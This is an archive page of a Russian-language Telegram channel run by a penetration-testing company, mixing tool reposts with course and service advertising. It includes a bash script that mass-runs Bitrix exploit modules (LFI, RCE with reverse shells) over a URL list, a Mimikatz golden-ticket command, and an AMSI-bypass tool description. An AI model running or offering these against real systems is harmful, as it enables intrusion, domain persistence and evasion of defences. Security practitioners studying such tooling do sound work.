ch
Feedback
RESOLUTE ATTACK

RESOLUTE ATTACK

前往频道在 Telegram

⚡️RESOLUTE ATTACK - Компания по информационной безопасности YouTube - https://www.youtube.com/@RESOLUTE-ATTACK Chat - @RESOLUTECHAT Web Site - www.resolute-attack.com Обратная связь - @ResoluteAttack_Bot

显示更多
7 299
订阅者
-324 小时
-117
-5330
帖子存档
Repost from Похек
🔥 quick-trics_auto.sh Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚 Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT

for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
        quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
        quick-tricks redirect -u $(sed -n "$i p" scope.txt)
        quick-tricks lfi -u $(sed -n "$i p" scope.txt)
        quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
        quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай. Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux. 🌚 @poxek

Repost from SecuriXy.kz
CrackMapExec - все... переходим на NetExec Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Exec
+1
CrackMapExec - все... переходим на NetExec Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др https://www.netexec.wiki Ставиться проще простого через pipx

apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Запускается тоже просто
NetExec
nxc
nxcdb
netexec

nxcdb
Для простоты восприятия можете добавить ~/.zshrc

alias cme=netexec
alias crackmapexec=netexec

Repost from Bafomёd OSINT
Запись вчерашнего стрима, мини обзор web версии. Запиь в облаке - https://cloud.mail.ru/public/Fr7y/CkhWFerFE

🛠 WEB APP PRTT IN PROGRESS....
+1
🛠 WEB APP PRTT IN PROGRESS....

🛠 WEB APP PRTT IN PROGRESS....
🛠 WEB APP PRTT IN PROGRESS....

Repost from 1N73LL1G3NC3
SharpKiller Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8 Live scan for new powershell processes every 0
SharpKiller Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8 Live scan for new powershell processes every 0.5 seconds -> Automatically patches new powershell instances

⚡️ Компания RESOLUTE ATTACK поддерживает разработку open source инструментов для пентеста RA помогает в разработке документац
⚡️ Компания RESOLUTE ATTACK поддерживает разработку open source инструментов для пентеста RA помогает в разработке документации на русском, английском языке и в популяризации инструмента для Lateral Movement - GOST v3 Одной из особенностей нашего инструмента является возможность создания множества цепочек перенаправления, что является Must Have в тестировании AD, и больших корпоративных сетей Мы также создали бота для обратной связи, где вы можете напрямую обратиться к разработчикам данного инструмента и помочь в улучшении его - @gogostbot Документация: https://gost.run/en/ GitHub: https://github.com/go-gost/gost

Уверенно можем сказать, что это потенциальный аналог мальтего в будущем, работы для этого предстоит ещё очень много

Repost from Bafomёd OSINT
https://t.me/osint_san_framework?livestream=044837696e686ad90d Стрим по новому инструменту через 40 минут. Обязательно приходим

RAS-X | SI VIS PACEM, PARA BELLUM | RESOLUTE ACTIVE SECURITY - X ⚡️ Компания RESOLUTE ATTACK представляет уникальное для России предложение и новый продукт RAS X - RESOLUTE ACTIVE SECURITY X https://youtu.be/EOfbLgUeb9E?feature=shared

Repost from Schwarz_Osint
Добрый день участник, ты нам нужен! У нас есть два публичных отдела, отдел расследований и отдел контента. Именно там происхо
Добрый день участник, ты нам нужен! У нас есть два публичных отдела, отдел расследований и отдел контента. Именно там происходит работа над сообществом и нам нужны люди! — Отдел Расследований (NPID) занимается расследованиями публичных некоммерческих кейсов, разработкой методологий поиска информации по зарубежью и чуть-чуть черной магией. Если у тебя уже есть опыт в OSINT и ты хочешь развить свои навыки работая в команде, то тебе к нам! Примером его работы является недавний кейс по Ronaldo 18K; — Отдел Контента (NPCD) занимается формированием новостей, следит за новостями из мира Разведки и всячески формулирует наше видение OSINT-индустрии. Если у тебя есть опыт копирайтинга, редактуры, или тебе интересно разобраться в индустрии, то тебе сюда! Примером его работы является наш ежемесячный #vestnik Для того что б попасть в нашу команду, пиши: @northen_palmyra

photo content

⚡️ NEW WEBAPP FOR PRTT CERTIFICATION
⚡️ NEW WEBAPP FOR PRTT CERTIFICATION

Немногие знают о существовании фичи которую использовать нельзя, она позволяет создавать бесконечный golden ticket. С грустью вспоминаю те времена, когда можно было создать golden ticket без существующей учётки в домене Я думаю все знают, что по стандарту золотой билет создаётся на 10 лет. И все понимают, что существуют настраиваемые политики домена. Но командой /endin: можно корректировать время жизни тикета в минутах Remi Solberg из offsec выяснил (бородой по круче чем у берсерка), путём не сложной игрой битами, что максимальное время жизни golden ticket - 2147483647 минут. Это примерно 4000 лет. Но детект не заставит вас долго ждать. Или у вас это просто не получится сделать, так как все админы находятся в Protected Users. Использовать не рекомендую Mimikatz kerberos::golden /user:user /domain:domain /sid:domainsid /krbtgt:hash /endin:2147483647 /ticket:название Tadn3wb

Repost from NETRUNNER GROUP
Давненько не было постов, начнем с начала! ⛈ Мы прошли долгий путь от простого Discord сервера до компании, помогающей в изуч
Давненько не было постов, начнем с начала! ⛈ Мы прошли долгий путь от простого Discord сервера до компании, помогающей в изучении такого нелегкого искусства как pentest и взращивающей этичных хакеров. Мы все еще придерживаемся нашей идеологии и не выкладываем рекламу сомнительных услуг, скама и чернухи. Мы уважаем и любим каждого нашего подписчика, ведь мы с вами состоим в этом сообществе NETRUNNER GROUP, где вам всегда будут рады. Уже провели 2 потока по подготовке к сертификации от компании RESOLUTE ATTACK. Было много трудностей, но мы продолжаем работать над этим замечательным проектом, где за хорошую цену вы получите максимум знаний для прохождения сертификации и дальнейшего трудоустройства. Торжественно анонсируем и стартуем продажи мест на FFPRTT. Мы решили ограничить количество мест до 15, дабы уделить каждому ученику должное внимание. Наш репетиторский курс не ограничивается теорией и практикой. Мы также придерживаемся традиции проводить занятия F2F с учениками и даем возможность узнать больше чем доступно в материале курса для полного погружения в профессию. Третий поток сможет познакомиться с нововведениями в обучении, о которых мы расскажем чуть позже. Третий поток начинается с 16 октября. Цена остается неизменной. Цена: 15000Р Длительность: 2 месяца ( Oct 16.2023 - Dec 16.2024 ) По всем вопросам писать: @netrunner_1G Весь материал останется с вами, материал улучшается с каждым потоком, это значит что присоединившись к нам однажды , вы получите качество навсегда ❤️

⚡️ Услуга RED TEAM выходит на новый уровень Задачи красной команды перед синей, теперь становится многообразней и обширней RED TEAM X - самый эффективный и информативный вид тестирования служб безопасности организации, ее сервисов, служб, персонала и процессов Теперь мы можем проверить не только эффективность мер информационной защиты и “Blue Team”, но теперь обладаем обширными возможностями по проверке работы физической службы безопасности, а также физических средств защиты информации ➡️ Подробнее - https://www.resolute-attack.com/Services/Rasx

Si vis pacem, para bellum Затишье перед бурей всегда было нашей отличительной чертой. RESOLUTE ATTACK умеет удивлять, и в это
Si vis pacem, para bellum Затишье перед бурей всегда было нашей отличительной чертой. RESOLUTE ATTACK умеет удивлять, и в этот раз мы это доказываем. 🟥 RESOLUTE ATTACK всегда отличалось своим агрессивным и жёстким стилем. Мы официально заявляем, что мы единственная компания в мире, которая предоставляет высококвалифицированную комплексную безопасность. От информационной до физической. Представляем вам наше новое направление - RESOLUTE ACTIVE SECURITY X (RAS-X) ⚡️ Команда профессионалов мирового уровня - лучшие в мире, с огромным опытом работы на всех уровнях и опытом успешной работы в реальных боевых действиях, множество государственных наград подтверждающих уровень и признание.

Сегодня последний день записи на сертификацию

Первый комплект сертификатов уже получили наши выпускники
Первый комплект сертификатов уже получили наши выпускники

Заметки ненастоящего сварщика. Как я сдавал BSCP Автор - @kitovras Читать